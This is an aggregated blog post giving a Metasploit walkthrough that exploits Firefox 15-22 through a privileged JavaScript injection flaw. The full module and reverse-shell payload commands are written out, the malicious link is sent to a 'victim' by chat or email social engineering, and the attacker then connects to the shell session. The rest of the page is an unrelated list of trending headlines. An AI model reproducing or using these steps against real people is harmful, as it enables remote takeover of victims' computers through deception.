Quantcast
Channel: Hacking Articles|Raj Chandel's Blog
Viewing all articles
Browse latest Browse all 1832

Hack Remote Windows, Linux, MAC PC using Firefox toString console.time Privileged JavaScript Injection

August 26, 2014, 12:26 am
$
0
0
This exploit gains remote code execution on Firefox 15-22 by abusing two separate Javascript-related vulnerabilities to ultimately inject malicious Javascript code into a context running with chrome:// privileges.

Exploit Targets
Firefox Version 15-22
Windows 7
Linux
Solaris
OSX

Requirement
Attacker: kali Linux
Victim PC: Windows 7


Open Kali terminal type msfconsole


Now type use exploit/multi/browser/firefox_tostring_console_injection
msf exploit (firefox_tostring_console_injection)>set payload firefox/shell_reverse_tcp
msf exploit (firefox_tostring_console_injection)>set lhost 192.168.0.104 (IP of Local Host)
msf exploit (firefox_tostring_console_injection)>set srvhost 192.168.0.104
msf exploit (firefox_tostring_console_injection)>set uripath /
msf exploit (firefox_tostring_console_injection)>exploit


Now an URL you should give to your victim http://192.168.0.104:8080
Send the link of the server to the victim via chat or email or any social engineering technique

Now you have access to the victims PC. Use “sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID


Search
Viewing all articles
Browse latest Browse all 1832

Trending Articles

Practice Sheet of Right form of verbs for HSC Students

September 22, 2019, 11:40 pm

Ex-Colchester United youth player Craig Winskill carried out armed robbery to...

August 7, 2014, 10:00 pm

Karimnagar District Tahsildars Phone Numbers-Mobile Numbers Telangana-State

February 18, 2016, 8:01 pm

Form: VAT: registration - land and property (VAT5L)

January 26, 2015, 6:26 am

High-speed Ethernet switches a bright spot in network forecasts

January 27, 2025, 6:10 am

Trial of East Grinstead man accused of rape to begin next week

September 13, 2013, 2:00 am

Arms accused back in court next month

August 14, 2018, 9:26 pm

Rajasthan Board 10th Result 2016 Roll No wise & Name Wise

August 20, 2016, 5:13 pm

MS-CHAPV2 NAP Policy failing - Reason Code 65

November 27, 2012, 10:01 am

In Court: Cases heard at Central Devon Magistrates' Court

December 11, 2013, 4:00 pm

Lady Gaga – MAYHEM [iTunes Plus M4A + M4V]

March 6, 2025, 7:56 am

VMOU RSCIT Result 2017, RSCIT Result VMOU rkcl.vmou.ac.in Name Wise

July 16, 2017, 9:40 pm

Bureau of Internal Revenue: Regional Offices (Directory)

January 9, 2014, 11:06 pm

Four Air Leitchville Pty Ltd v Hurlad Pty Ltd (No 3) [2024] FCA 238

March 13, 2024, 12:00 am

A/L Technology Stream – Subject combinations, Syllabuses and Teacher guides

December 17, 2013, 6:12 pm

Wazifa Remedy to Increase Enlarge Penis Size

November 8, 2015, 9:57 pm

NCERT Solutions for Class 9th Sanskrit Chapter 3 पाथेयम्

December 22, 2016, 3:50 am

Theja Surapaneni The ‘Most Attractive' Man on Australian TV Of All Time

March 29, 2018, 1:47 am

Schools benefit from American donation

October 17, 2021, 3:00 pm

TBT: Samini “Tempo” Feat Mugeez (R2Bees) Prod by Kaywa

October 2, 2014, 10:40 am
Search
<script src="https://jsc.adskeeper.com/r/s/rssing.com.1596347.js" async> </script>